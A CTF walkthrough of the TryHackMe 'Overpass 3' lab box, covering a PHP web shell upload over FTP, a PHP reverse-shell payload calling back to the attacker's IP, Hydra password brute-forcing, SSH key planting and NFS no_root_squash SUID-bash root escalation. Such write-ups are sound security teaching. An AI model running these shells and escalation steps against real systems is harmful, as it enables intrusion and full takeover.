Overpass3

You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security…

This is Overpass 3 - Hosting from THM. It’s medium rated. I add overpass3 to /etc/hosts.

Ports

We’ve got FTP, SSH and HTTP on the standard ports.

FTP

No anonymous access, we’ll move on for now.

HTTP

I started trying dirsearch and I must say it’s pretty comfy:

root@kali:/opt/tryhackme/overpass3# python3 /opt/dirsearch/dirsearch.py -u http://overpass3

It comes with it’s own wordlist (although you can use any), and it finds something useful:

[05:22:59] 301 - 233B - /backups -> http://overpass3/backups/
[05:23:00] 200 - 894B - /backups/

From there, we get a file called backup.zip, which is not password protected and which contains two files:

12K -rw-r–r– 1 root root 11K Nov 8 16:18 CustomerDetails.xlsx.gpg
4.0K -rw——- 1 root root 3.5K Nov 8 16:16 priv.key

This is PGP stuff:

root@kali:/opt/tryhackme/overpass3/temporary# gpg --import priv.key
gpg: key C9AE71AB3180BC08: "Paradox <paradox@overpass.thm>" not changed
gpg: key C9AE71AB3180BC08: secret key imported
gpg: Total number processed: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:  secret keys unchanged: 1
root@kali:/opt/tryhackme/overpass3/temporary# gpg --decrypt CustomerDetails.xlsx.gpg > details.xlsx
gpg: encrypted with 2048-bit RSA key, ID 9E86A1C63FB96335, created 2020-11-08
      "Paradox <paradox@overpass.thm>"

This gets us an Excel file containing 3 usernames and passwords.

Hydra

Which service to use this on? We can try them both:

root@kali:/opt/tryhackme/overpass3# hydra -L users.txt -P pass.txt ftp://overpass3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-14 05:31:48
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ftp://overpass3:21/
[21][ftp] host: overpass3   login: paradox   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-14 05:31:53
root@kali:/opt/tryhackme/overpass3# hydra -L users.txt -P pass.txt ssh://overpass3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-14 05:32:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://overpass3:22/
[ERROR] target ssh://10.10.188.216:22/ does not support password authentication (method reply 36).

Right, so we can log in to FTP, but SSH is key based only. Goodo.

FTP, again

We log in to FTP and we get the root of the webserver. A little testing shows we can upload to this directory, so I upload something simple in a file called cmd.php:

<?php system($_GET['cmd']);?>

And I send it this from Burpsuite:

cmd=php+-r+'$sock%3dfsockopen("10.9.10.123",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b'

to get a shell.

Apache

The host is running CentOS and we are the Apache user. We don’t seem to have which; no matter.

sh-4.4$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-4.4$ which python3
which python3
which: no python3 in ((null))
sh-4.4$ ls /usr/bin | grep python
ls /usr/bin | grep python
python3
python3.6
python3.6m
unversioned-python
sh-4.4$ /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash");'
/usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash");'
bash-4.4$ 

From bash, we can su to paradox using the same password as for the FTP account. He has a .ssh directory in his home, and we can add our key to his authorized_keys file to get SSH access:

[paradox@localhost .ssh]$ printf 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCeyp%%AND THE REST OF MY PUBLIC KEY%%/orR1AjlnSE= root@kali\n' >> authorized_keys

Now we can just do:

root@kali:/opt/tryhackme/overpass3# ssh paradox@overpass3  
Last login: Thu Jan 14 10:40:45 2021
[paradox@localhost ~]$ 

James

As paradox I run linpeas, which finds this in /etc/exports:

/home/james *(rw,fsid=0,sync,no_root_squash,insecure)

However thinking back we had no port 2049, so NFS is only open on the localhost. We can’t mount the share on this host, because we aren’t root. Hmm.

SSH Tunnel

We can mount the share using an SSH tunnel on our local machine. First, we set up the tunnel:

root@kali:/opt/tryhackme/overpass3# ssh -L 3049:127.0.0.1:2049 paradox@overpass3

Next, we mount the share:

root@kali:/opt/tryhackme/overpass3# mount -t nfs -o port=3049,vers=4 127.0.0.1:/ ./mnt

Where ./mnt was a local folder I’d created. Note this syntax caused me quite a few headaches; particularly the path part - NFS4 is different to NFS3 and the shared path is considered / when you mount it.

From there, we could get the user flag:

root@kali:/opt/tryhackme/overpass3/mnt# ls -lash
total 20K
   0 drwx------ 3 james kali  112 Nov 17 16:15 .
4.0K drwxr-xr-x 5 root  root 4.0K Jan 13 05:48 ..
   0 lrwxrwxrwx 1 root  root    9 Nov  8 16:45 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 james kali   18 Nov  8  2019 .bash_logout
4.0K -rw-r--r-- 1 james kali  141 Nov  8  2019 .bash_profile
4.0K -rw-r--r-- 1 james kali  312 Nov  8  2019 .bashrc
   0 drwx------ 2 james kali   61 Nov  7 21:20 .ssh
4.0K -rw------- 1 james kali   38 Nov 17 16:15 user.flag

Note there was also a web flag belonging to Apache; it was in the home directory for the apache user. We can find that by looking in /etc/passwd; it’s /usr/share/httpd. Anyway, onwards …

Root

Privesc was now a fairly classic NFS technique - make a copy of bash in our mounted drive and give it the SUID bit:

root@kali:/opt/tryhackme/overpass3/mnt# cp /bin/bash .
root@kali:/opt/tryhackme/overpass3/mnt# chmod +s bash

Doesn’t look like much, does it? While I’m at it, I add my SSH public key to the authorized_keys file for james just like I did for paradox.

Separately:

root@kali:/opt/tryhackme/overpass3# ssh james@overpass3
Last login: Thu Jan 14 09:15:57 2021 from 10.9.10.123
[james@localhost ~]$ pwd
/home/james
[james@localhost ~]$ ls -lash
total 1.2M
   0 drwx------. 4 james james  138 Jan 14 10:14 .
   0 drwxr-xr-x. 4 root  root    34 Nov  8 19:34 ..
1.2M -rwsr-sr-x  1 root  root  1.2M Jan 14 10:14 bash
   0 lrwxrwxrwx. 1 root  root     9 Nov  8 21:45 .bash_history -> /dev/null
4.0K -rw-r--r--. 1 james james   18 Nov  8  2019 .bash_logout
4.0K -rw-r--r--. 1 james james  141 Nov  8  2019 .bash_profile
4.0K -rw-r--r--. 1 james james  312 Nov  8  2019 .bashrc
   0 drwx------  2 james james   44 Jan 14 09:17 .gnupg
   0 drwx------. 2 james james   61 Nov  8 02:20 .ssh
4.0K -rw-------. 1 james james   38 Nov 17 21:15 user.flag
[james@localhost ~]$ ./bash -p
./bash: /lib64/libtinfo.so.6: no version information available (required by ./bash)
bash-5.1# id
uid=1000(james) gid=1000(james) euid=0(root) egid=0(root) groups=0(root),1000(james)
bash-5.1#

And that was that.

Footnote

I haven’t written anything for a bit; I’ve been trying (and failing) on EnterPrize, a new hard box on THM. I’ve enumerated the box, found the hidden subdomain (maintest.enterprize.thm) and poked around. It’s typo3, and I am fairly sure the exploit is a PHP deserialization as described here using a leaked encryptionKey, which can be found on the box and which I have. However I have tried the exploit as described and so far I can’t get it to work. Ah well, it’s kept me entertained anyway.